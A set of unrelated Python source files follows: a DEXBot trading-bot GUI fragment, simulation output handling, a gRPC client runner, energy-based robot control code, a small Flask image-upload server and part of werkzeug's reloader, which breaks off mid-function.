if return_value == 1:
worker_name = create_worker_dialog.worker_name
self.main_controller.create_worker(worker_name)
self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)
self.add_worker_widget(worker_name)
@pyqtSlot(name='handle_open_settings')
@gui_error
def handle_open_settings(self):
settings_dialog = SettingsView()
reconnect = settings_dialog.exec_()
if reconnect:
# Reinitialize config after closing the settings window
self.config = Config()
self.main_controller.config = self.config
self.connect_to_bitshares()
@staticmethod
@pyqtSlot(name='handle_open_documentation')
def handle_open_documentation():
webbrowser.open('https://github.com/Codaone/DEXBot/wiki')
def set_worker_name(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_name(value)
def set_worker_account(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_account(value)
def set_worker_profit(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_profit(value)
def set_worker_market(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_market(value)
def set_worker_slider(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_slider(value)
def customEvent(self, event):
# Process idle_queue_dispatcher events
event.callback()
def closeEvent(self, event):
self.closing = True
self.status_bar.showMessage("Closing app...")
if self.status_bar_updater and self.status_bar_updater.is_alive():
self.status_bar_updater.join()
def _update_statusbar_message(self):
while not self.closing:
# When running first time the workers are also interrupting with the connection
# so we delay the first time to get correct information
if self.statusbar_updater_first_run:
self.statusbar_updater_first_run = False
time.sleep(1)
msg = self.get_statusbar_message()
idle_add(self.set_statusbar_message, msg)
runner_count = 0
# Wait for 30s but do it in 0.5s pieces to not prevent closing the app
while not self.closing and runner_count < 60:
runner_count += 1
time.sleep(0.5)
def get_statusbar_message(self):
node = self.main_controller.bitshares_instance.rpc.url
try:
latency = self.main_controller.measure_latency(node)
except BaseException:
latency = -1
if latency != -1:
return "ver {} - Node delay: {:.2f}ms - node: {}".format(__version__, latency, node)
else:
return "ver {} - Node disconnected".format(__version__)
def set_statusbar_message(self, msg):
self.status_bar.showMessage(msg)
def set_worker_status(self, worker_name, level, status):
if worker_name != 'NONE':
worker = self.worker_widgets.get(worker_name, None)
if worker:
worker.set_status(status)
|
output.py
|
from dgdynamic.utils.project_utils import LogMixin, make_directory
from dgdynamic.config.settings import config
from dgdynamic.utils.plotter import matplotlib_plot
from scipy.interpolate import interpolate
import threading
import time
import csv
import matplotlib.pyplot as plt
import os.path
import enum
import collections
import array
import numpy
class SimulationOutput(LogMixin):
def __init__(self, solved_by, user_sim_range, symbols, dependent=(), independent=(), ignore=(),
solver_method=None, errors=(),):
self.dependent = numpy.asanyarray(dependent, dtype=float)
self.independent = numpy.asanyarray(independent, dtype=float)
self.errors = errors
self.solver_used = solved_by
self.solver_method_used = solver_method
self.requested_simulation_range = user_sim_range
if independent is not None and len(independent) >= 2:
self.simulation_duration = abs(independent[-1] - independent[0])
elif independent is not None and len(independent) == 1:
self.simulation_duration = independent[0]
else:
self.simulation_duration = 0.0
try:
self._ignored = tuple(item[1] for item in ignore)
except IndexError:
self._ignored = ignore
self._path = os.path.abspath(config['Output Paths']['DATA_DIRECTORY'])
self._file_writer_thread = None
self.symbols = tuple(symbols) if isinstance(symbols, collections.Generator) else symbols
def has_sim_prematurely_stopped(self, rel_tol=1e-05, abs_tol=1e-08):
if len(self.independent) > 0:
return not numpy.isclose(self.independent[-1], self.requested_simulation_range[1],
rtol=rel_tol, atol=abs_tol)
else:
return self.requested_simulation_range[1] != 0
def is_data_evenly_spaced(self, rel_tol=1e-05, abs_tol=1e-08):
delta_t = 0
time_vals = self.independent
if len(time_vals) >= 2:
delta_t = abs(time_vals[1] - time_vals[0])
for i in range(1, len(time_vals)):
curr_t = time_vals[i]
if i < len(time_vals) - 1:
next_t = time_vals[i + 1]
curr_dt = abs(next_t - curr_t)
if not numpy.isclose(curr_dt, delta_t, rtol=rel_tol, atol=abs_tol):
return False
return True
def interpolate_data(self, new_sample_resolution, kind='linear'):
"""Shall return a new evenly spaced interpolated version of the original output"""
if new_sample_resolution > 0:
new_independent = numpy.linspace(self.independent[0], self.independent[-1], num=new_sample_resolution)
interpolation_func = interpolate.interp1d(self.independent, self.dependent, axis=0, kind=kind)
return SimulationOutput(self.solver_used, self.requested_simulation_range, self.symbols,
dependent=interpolation_func(new_independent), independent=new_independent,
ignore=self._ignored, solver_method=self.solver_method_used, errors=self.errors)
return self
@property
def is_output_set(self):
return False
@property
def has_errors(self):
return len(self.errors) > 0
@property
def is_empty(self):
return len(self.independent) + len(self.dependent) == 0
@property
def dependent_dimension(self):
return len(self.dependent[0])
def plot(self, filename=None, labels=None, figure_size=None, axis_labels=None,
axis_limits=None, title=None, show_grid=True, has_tight_layout=True):
if title is None and isinstance(self.solver_used, (str, enum.Enum)):
if isinstance(self.solver_used, enum.Enum):
title = self.solver_used.name.title()
else:
title = self.solver_used
if self.solver_method_used is not None:
title += (" - " + self.solver_method_used.name)
input_values = {
'independent': self.independent,
'dependent': self.dependent,
'symbols': self.symbols,
'ignored': self._ignored,
'title': title,
'filename': filename,
'labels': labels,
'figure_size': figure_size,
'axis_labels': axis_labels,
'axis_limits': axis_limits,
'show_grid': show_grid,
'has_tight_layout': has_tight_layout,
}
matplotlib_plot(input_values)
return self
@staticmethod
def show(*args, **kwargs):
plt.show(*args, **kwargs)
def _get_file_prefix(self, name, extension=".tsv", prefix=None):
if prefix is None:
return os.path.join(self._path, "{}_{}{}".format(self.solver_used.value, name, extension))
else:
return os.path.join(self._path, "{}{}{}".format(prefix, name, extension))
def _filter_out_ignores(self):
for rows in self.dependent:
filtered_row = ()
for index, item in enumerate(rows):
if index not in self._ignored:
filtered_row += (item,)
yield filtered_row
@property
def filtered_output(self):
return SimulationOutput(self.solver_used,
dependent=tuple(self._filter_out_ignores()),
independent=self.independent, ignore=(),
solver_method=self.solver_method_used,
symbols=self.symbols, errors=self.errors,
user_sim_range=self.requested_simulation_range)
def save(self, filename, prefix=None, unfiltered=False, labels=None, stream=None):
"""
Saves the independent and dependent variables as a Tab Separated Variables(TSV) file in the directory specified
by the DATA_DIRECTORY variable in the configuration file. The name of the TSV file is constructed from a
concatenation of the ODE solver name followed by a underscore, the 'name' parameter and finally the file
extension.
:param prefix: name prefix for the data file. Default is the plugin name followed by an underscore.
:param unfiltered: whether to mark 'unchanging species' in the output data set
:param filename: a name for the data file
:param stream: use another stream than a file stream
:param labels: use custom header labels for species. Default is the symbols specified by the model.
:return:
"""
float_precision = config.getint('Simulation', 'FIXED_POINT_PRECISION', fallback=18)
if len(self.dependent) == 0 or len(self.independent) == 0:
self._logger.warn("No or mismatched data")
return
if unfiltered:
paired_data = zip(self.independent, self.dependent)
else:
paired_data = zip(self.independent, self._filter_out_ignores())
make_directory(config['Output Paths']['DATA_DIRECTORY'], pre_delete=False)
if unfiltered:
dependent_dimension = self.dependent_dimension
else:
dependent_dimension = max(self.dependent_dimension - len(self._ignored), 0)
self._logger.debug("Dimension of the dependent variable is {}".format(dependent_dimension))
header_labels = self.symbols if labels is None else labels
assert isinstance(header_labels, (list, set, tuple))
def header():
yield "time"
for index, label in enumerate(header_labels):
if unfiltered and index in self._ignored:
yield "_{}".format(label)
else:
yield label
def format_float(variable):
return "{:.{}f}".format(variable, float_precision)
def data_rows():
for independent, dependent in paired_data:
yield (format_float(independent),) + tuple(format_float(var) for var in dependent)
if stream is None:
file_path = self._get_file_prefix(filename, prefix=prefix)
self._logger.info("Saving data as {}".format(file_path))
stream = open(file_path, mode="w")
def write_data():
self._logger.info("Started on writing data to disk")
start_t = time.time()
with stream as outfile:
# writing header underscore prefix marks that the columns where ignored (for ODE only, since SPiM
# don't output data for a variable if it's not in the plot directive)
writer = csv.writer(outfile, delimiter="\t")
writer.writerow(element for element in header())
for row in data_rows():
writer.writerow(row)
end_t = time.time()
self._logger.info("Finished writing to disk. Took: {} secs".format(end_t - start_t))
self._file_writer_thread = threading.Thread(target=write_data)
self._file_writer_thread.start()
return self
def __getitem__(self, index):
return self.independent[index], self.dependent[index]
def __iter__(self):
for i in range(len(self.independent)):
yield self.independent[i], self.dependent[i]
def __len__(self):
return (len(self.independent) + len(self.dependent)) // 2
def __str__(self):
return "independent variable: {}\ndependent variable: {}".format(self.independent,
self.dependent)
class SimulationOutputSet(LogMixin):
def __init__(self, output):
self.output_set = tuple(output)
def plot(self, filename=None, **kwargs):
if isinstance(filename, collections.Iterable):
for filename, output in zip(filename, self.output_set):
output.plot(filename=filename, **kwargs)
elif filename is None:
for output in self.output_set:
output.plot(filename=filename, **kwargs)
else:
raise TypeError("Expected an iterable collection of file names; got {}"
.format(type(filename)))
return self
def save(self, filename, **kwargs):
if isinstance(filename, collections.Iterable):
for filename, output in zip(filename, self.output_set):
output.save(filename=filename, **kwargs)
else:
raise TypeError("Expected an iterable collection of file names; got {}"
.format(type(filename)))
return self
@property
def is_output_set(self):
return True
@property
def filtered_output(self):
return SimulationOutputSet((out.filtered_output for out in self.output_set))
@property
def data_matrix(self):
return tuple((array.array('d', column) for column in out.columns) for out in self.output_set)
@property
def failure_indices(self):
return tuple(i for i, o in enumerate(self.output_set) if o.has_errors)
@property
def failures(self):
return SimulationOutputSet(filter(lambda obj: not obj.has_errors, self.output_set))
@property
def successes(self):
return SimulationOutputSet(filter(lambda obj: obj.has_errors, self.output_set))
def __iter__(self):
return self.output_set.__iter__()
def __getitem__(self, key):
return self.output_set.__getitem__(key)
def __len__(self):
return self.output_set.__len__()
def __repr__(self):
return "<SimulationOutputSet with {} runs>".format(self.__len__())
|
client_runner.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines behavior for WHEN clients send requests.
Each client exposes a non-blocking send_request() method that the
ClientRunner invokes either periodically or in response to some event.
"""
import abc
import threading
import time
class ClientRunner:
"""Abstract interface for sending requests from clients."""
__metaclass__ = abc.ABCMeta
def __init__(self, client):
self._client = client
@abc.abstractmethod
def start(self):
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
raise NotImplementedError()
class OpenLoopClientRunner(ClientRunner):
def __init__(self, client, interval_generator):
super(OpenLoopClientRunner, self).__init__(client)
self._is_running = False
self._interval_generator = interval_generator
self._dispatch_thread = threading.Thread(
target=self._dispatch_requests, args=())
def start(self):
self._is_running = True
self._client.start()
self._dispatch_thread.start()
def stop(self):
self._is_running = False
self._client.stop()
self._dispatch_thread.join()
self._client = None
def _dispatch_requests(self):
while self._is_running:
self._client.send_request()
time.sleep(next(self._interval_generator))
class ClosedLoopClientRunner(ClientRunner):
def __init__(self, client, request_count):
super(ClosedLoopClientRunner, self).__init__(client)
self._is_running = False
self._request_count = request_count
# Send a new request on each response for closed loop
self._client.add_response_callback(self._send_request)
def start(self):
self._is_running = True
self._client.start()
for _ in xrange(self._request_count):
self._client.send_request()
def stop(self):
self._is_running = False
self._client.stop()
self._client = None
def _send_request(self, client, response_time):
if self._is_running:
client.send_request()
|
cep_control_lefthand_base.py
|
import torch
import torch.autograd as autograd
import numpy as np
from cep.utils import torch2numpy, numpy2torch
import torch.nn as nn
from cep.optimizer import RWR
from cep.maps import Map
import time, copy
# from torch.multiprocessing import Pool
# torch.multiprocessing.set_start_method('fork', force=True)
# todo: Use Sympy for systems evolution
def solve_euler(q, dq, dt):
return q + dq * dt
class Multi_EBMControl():
def __init__(self, energy_tree, device, dim=9, dt=0.01, optimization_steps=10, n_particles=10000, var_0=10., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1)
self.log_p_dq = torch.zeros((n_particles)) # TODO: 06.28
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state, stochastic='False'):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivaritae Gaussian distribution , self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
#self.energy_tree.set_context(state)
for jj in range(len(self.energy_tree)): # TODO: 06.28
self.energy_tree[jj].set_context(state)
# for et in self.energy_tree:
# et.set_context(state)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action()
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device)*self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
# for ii in range(0, len(self.energy_tree)): # TODO: 06.28
# tmp = torch.clone(self.energy_tree[ii].log_prob(action))
# self.log_p_dq = tmp + self.log_p_dq
#
# for et in self.energy_tree:
# self.log_p_dq += et.log_prob(action)
self.log_p_dq = .05 * self.energy_tree[0].log_prob(action) + .95 * self.energy_tree[1].log_prob(action) # TODO: 07.10 FIX jscAndGoto!
#log_p_dq = self.energy_tree.log_prob(action) # Energy, torch.Size([1000]) # TODO: 06.28
t2 = time.time()
mu, var = self.optimizer.optimize(action, self.log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EBMControl():
def __init__(self, energy_tree, device, dim=9, dt=0.005, optimization_steps=100, n_particles=10000, var_0=1., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1) # TODO: Maybe try different Black-box algorithms
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state, stochastic='False'):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivaritae Gaussian distribution , self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
self.energy_tree.set_context(state)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action()
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device) * self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
log_p_dq = self.energy_tree.log_prob(action) # Energy, torch.Size([1000]) # TODO:
t2 = time.time()
mu, var = self.optimizer.optimize(action, log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EnergyTree(nn.Module):
'''
An Energy Tree is the base node of a Tree. It will be composed of a Mapping, that transforms state and action to some latent state
and branches
'''
def __init__(self, branches, map=None, i_temperatures=None):
super(EnergyTree, self).__init__()
if map is None:
self.map = Map()
else:
self.map = map
if i_temperatures is None:
#self.i_temperatures = torch.ones(len(branches)) #TODO: Change parameters
self.i_temperatures = torch.tensor((1.0, 1.0))
#self.i_temperatures = torch.tensor((0.2, 1.0)) # TaskGoto, PathPlan
#self.i_temperatures = nn.Parameter(i_temperatures)
self.branches = nn.ModuleList(branches)
def set_context(self, state):
state_z = self.map.map_state(state) # state -> torch.Size([1, 20]), state_z =
#processes = []
for branch in self.branches:
self.set_context_i(branch, state_z)
# branch.share_memory()
# p = mp.Process(target=self.set_context_i, args=(branch, state_z,))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#time.sleep(0.1)
def set_context_i(self, energy, state):
energy.set_context(state)
def log_prob(self, action): # action -> torch.Size([1000, 7])
action_z = self.map.map_action(action) # FK_map, action_z -> torch.Size([1000, 7, 6]) | # Selection_map, action_z -> torch.Size([1000, 6])
logp_a = torch.zeros(action.shape[0]).to(action)
for idx, branch in enumerate(self.branches):
logp_a += self.i_temperatures[idx] * branch.log_prob(action_z)
return logp_a # torch.Size([1000])
# pool = Pool(processes=len(self.branches))
# idx = 0
# with Pool(processes=len(self.branches)) as p:
# log_prob = p.map(self.log_prob_i, self.branches,)
def log_prob_i(self, energy, action):
#print(ind)
return energy.log_prob(action)
class EBMControl_x(): # TODO: added on 09.13
def __init__(self, energy_tree, device, dim=10, dt=0.005, optimization_steps=100, n_particles=10000, var_0=1., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1) # TODO: Maybe try different Black-box algorithms
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state_t, stochastic='False'):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivaritae Gaussian distribution , self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
self.energy_tree.set_context(state_t)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action(state_t)
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self, state):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device) * self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
# TODO: Sample from action(ddq)
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
log_p_dq = self.energy_tree.log_prob(action, state) # Energy, torch.Size([1000]) # TODO:
t2 = time.time()
mu, var = self.optimizer.optimize(action, log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EnergyTree_x(nn.Module):
'''
An Energy Tree is the base node of a Tree. It will be composed of a Mapping, that transforms state and action to some latent state
and branches
'''
def __init__(self, branches, map=None, i_temperatures=None):
super(EnergyTree_x, self).__init__()
if map is None:
self.map = Map()
else:
self.map = map
if i_temperatures is None:
self.i_temperatures = torch.ones(len(branches)) #TODO: Change parameters
#self.i_temperatures = torch.tensor((1.0, 5.))
#self.i_temperatures = torch.tensor((0.2, 1.0)) # TaskGoto, PathPlan
#self.i_temperatures = nn.Parameter(i_temperatures)
self.branches = nn.ModuleList(branches)
def set_context(self, state):
state_z = self.map.map_state(state) # state -> torch.Size([1, 20]), state_z = [torch.Size([2]), torch.Size([2])]
#processes = []
for branch in self.branches:
self.set_context_i(branch, state_z)
# branch.share_memory()
# p = mp.Process(target=self.set_context_i, args=(branch, state_z,))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
#time.sleep(0.1)
def set_context_i(self, energy, state):
energy.set_context(state)
def log_prob(self, action, state): # action -> torch.Size([1000, 7])
action_z = self.map.map_action(action) # FK_map, action_z -> torch.Size([1000, 7, 6]) | # Selection_map, action_z -> torch.Size([1000, 6])
state_z = self.map.map_state(state)
logp_a = torch.zeros(action.shape[0]).to(action)
for idx, branch in enumerate(self.branches):
logp_a += self.i_temperatures[idx] * branch.log_prob(action_z, state_z)
return logp_a # torch.Size([1000])
# pool = Pool(processes=len(self.branches))
# idx = 0
# with Pool(processes=len(self.branches)) as p:
# log_prob = p.map(self.log_prob_i, self.branches,)
def log_prob_i(self, energy, action):
#print(ind)
return energy.log_prob(action)
|
main.py
|
from flask import Flask, request, send_file
from random import choices as rndchoices
import bcrypt
import yaml
from threading import Thread
import os
import sys
# original file does NOT use pytorch, updated one DOES
# from backgroundbegone import removeBackground
from backgroundbegone2 import removeBackground
app = Flask(__name__)
images = {"a1": None} # imagename, password
imagesStorage = "images.yaml"
unprocessedImgs = "non-processed/"
processedImgs = "images/"
@app.route('/')
def home():
return "This is the home page for PicAFriend! Why are you here?"
# should be a file uploaded, as well as a bool in the header which contains the password (if desired)
@app.route('/upload/', methods=['POST'])
def upload():
if request.method != 'POST': return # we only want POST
f = request.files['image.png']
try:
psswd = request.headers['psswd']
except KeyError: # no password
psswd = None
# generate image key
while 1:
name = ''.join(rndchoices("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567", k=8)) # 8 random base32 characters
if name not in images.keys():
break
saveAs = f"{unprocessedImgs}{name}.png"
f.save(saveAs)
Thread(target=lambda: removeBackground(saveAs)).start()
images[name] = None if psswd is None else genPassword(psswd)
saveImagesAndKeys(images)
return name
@app.route('/images/<name>')
def get_image(name):
if name not in images.keys():
return "Image not found", 404
try:
requestPassword = request.headers['psswd']
except KeyError: # no password included
requestPassword = None
password = images[name]
if password is not None and not checkPassword(password, requestPassword):
return "Incorrect password", 401
try:
return send_file(f"{processedImgs}{name}.png")
except FileNotFoundError: # image isnt done processing
return "Image not ready, check back in a bit", 409
def genPassword(password):
'''Returns a salted and hashed version of the original string'''
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
return hashed
def checkPassword(hashedpw, unhashedpw):
return bcrypt.checkpw(unhashedpw.encode(), hashedpw)
def loadImagesAndKeys():
'''returns the dict of images and keys that is stored in the varible images'''
try:
with open(imagesStorage, "r") as f:
imgs = yaml.safe_load(f)
except FileNotFoundError: # probably our first go, the file doesn't exist yet, lets create it
with open(imagesStorage, 'a') as f:
imgs = None
return dict() if imgs is None else imgs
def saveImagesAndKeys(imgs):
'''saves the dictionary imgs'''
with open(imagesStorage, "w+") as f:
yaml.safe_dump(imgs, f)
def main():
#TODO: task queue (so memory doesnt get out of hand)
# merge the existsing (constant) dict with whatever is written to disk
images.update(loadImagesAndKeys())
# create the image directories if they dont already exist
for i in [unprocessedImgs, processedImgs]:
if not os.path.exists(i[:-1]):
os.makedirs(i[:-1])
port = sys.argv[1]
app.run(host="0.0.0.0", port=port)
if __name__ == "__main__":
main()
|
_reloader.py
|
import fnmatch
import os
import subprocess
import sys
import threading
import time
import typing as t
from itertools import chain
from pathlib import PurePath
from ._internal import _log
# The various system prefixes where imports are found. Base values are
# different when running in a virtualenv. The stat reloader won't scan
# these directories, it would be too inefficient.
prefix = {sys.prefix, sys.base_prefix, sys.exec_prefix, sys.base_exec_prefix}
if hasattr(sys, "real_prefix"):
# virtualenv < 20
prefix.add(sys.real_prefix) # type: ignore
_ignore_prefixes = tuple(prefix)
del prefix
def _iter_module_paths() -> t.Iterator[str]:
"""Find the filesystem paths associated with imported modules."""
# List is in case the value is modified by the app while updating.
for module in list(sys.modules.values()):
name = getattr(module, "__file__", None)
if name is None:
continue
while not os.path.isfile(name):
# Zip file, find the base file without the module path.
old = name
name = os.path.dirname(name)
if name == old: # skip if it was all directories somehow
break
else:
yield name
def _remove_by_pattern(paths: t.Set[str], exclude_patterns: t.Set[str]) -> None:
for pattern in exclude_patterns:
paths.difference_update(fnmatch.filter(paths, pattern))
def _find_stat_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Returns imported
module files, Python files under non-system paths. Extra files and
Python files under extra directories can also be scanned.
System paths have to be excluded for efficiency. Non-system paths,
such as a project root or ``sys.path.insert``, should be the paths
of interest to the user anyway.
"""
paths = set()
for path in chain(list(sys.path), extra_files):
path = os.path.abspath(path)
if os.path.isfile(path):
# zip file on sys.path, or extra file
paths.add(path)
for root, dirs, files in os.walk(path):
# Ignore system prefixes for efficience. Don't scan
# __pycache__, it will have a py or pyc module at the import
# path. As an optimization, ignore .git and .hg since
# nothing interesting will be there.
if root.startswith(_ignore_prefixes) or os.path.basename(root) in {
"__pycache__",
".git",
".hg",
}:
dirs.clear()
continue
for name in files:
if name.endswith((".py", ".pyc")):
paths.add(os.path.join(root, name))
paths.update(_iter_module_paths())
_remove_by_pattern(paths, exclude_patterns)
return paths
def _find_watchdog_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Looks at the same
sources as the stat reloader, but watches everything under
directories instead of individual files.
"""
dirs = set()
for name in chain(list(sys.path), extra_files):
name = os.path.abspath(name)
if os.path.isfile(name):
name = os.path.dirname(name)
dirs.add(name)
for name in _iter_module_paths():
dirs.add(os.path.dirname(name))
_remove_by_pattern(dirs, exclude_patterns)
return _find_common_roots(dirs)
def _find_common_roots(paths: t.Iterable[str]) -> t.Iterable[str]:
root: t.Dict[str, dict] = {}
for chunks in sorted((PurePath(x).parts for x in paths), key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node: t.Mapping[str, dict], path: t.Tuple[str, ...]) -> None:
for prefix, child in node.items():
_walk(child, path + (prefix,))
if not node:
rv.add(os.path.join(*path))
_walk(root, ())
return rv
def _get_args_for_reloading() -> t.List[str]:
"""Determine how the script was executed, and return the args needed
to execute it again in a new process.
"""
rv = [sys.executable]
py_script = sys.argv[0]
args = sys.argv[1:]
# Need to look at main module to determine how it was executed.
__main__ = sys.modules["__main__"]
# The value of __package__ indicates how Python was called. It may
# not exist if a setuptools script is installed as an egg. It may be
# set incorrectly for entry points created with pip on Windows.
if getattr(__main__, "__package__", None) is None or (
os.name == "nt"
and __main__.__package__ == ""
and not os.path.exists(py_script)
and os.path.exists(f"{py_script}.exe")
):
# Executed a file, like "python app.py".
py_script = os.path.abspath(py_script)
if os.name == "nt":
# Windows entry points have ".exe" extension and should be
# called directly.
if not os.path.exists(py_script) and os.path.exists(f"{py_script}.exe"):
py_script += ".exe"
if (
os.path.splitext(sys.executable)[1] == ".exe"
and os.path.splitext(py_script)[1] == ".exe"
):
rv.pop(0)
rv.append(py_script)
else:
# Executed a module, like "python -m werkzeug.serving".
if sys.argv[0] == "-m":
# Flask works around previous behavior by putting
# "-m flask" in sys.argv.
# TODO remove this once Flask no longer misbehaves
args = sys.argv
else:
if os.path.isfile(py_script):
# Rewritten by Python from "-m script" to "/path/to/script.py".
py_module = t.cast(str, __main__.__package__)
name = os.path.splitext(os.path.basename(py_script))[0]
if name != "__main__":
py_module += f".{name}"
else:
# Incorrectly rewritten by pydevd debugger from "-m script" to "script".
py_module = py_script
rv.extend(("-m", py_module.lstrip(".")))
rv.extend(args)
return rv
class ReloaderLoop:
name = ""
def __init__(
self,
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
) -> None:
self.extra_files: t.Set[str] = {os.path.abspath(x) for x in extra_files or ()}
self.exclude_patterns: t.Set[str] = set(exclude_patterns or ())
self.interval = interval
def __enter__(self) -> "ReloaderLoop":
"""Do any setup, then run one step of the watch to populate the
initial filesystem state.
"""
self.run_step()
return self
def __exit__(self, exc_type, exc_val, exc_tb): # type: ignore
"""Clean up any resources associated with the reloader."""
pass
def run(self) -> None:
"""Continually run the watch step, sleeping for the configured
interval after each step.
"""
while True:
self.run_step()
time.sleep(self.interval)
def run_step(self) -> None:
"""Run one step for watching the filesystem. Called once to set
up initial state, then repeatedly to update it.
"""
pass
def restart_with_reloader(self) -> int:
"""Spawn a new Python interpreter with the same arguments as the
current one, but running the reloader thread.
"""
while True:
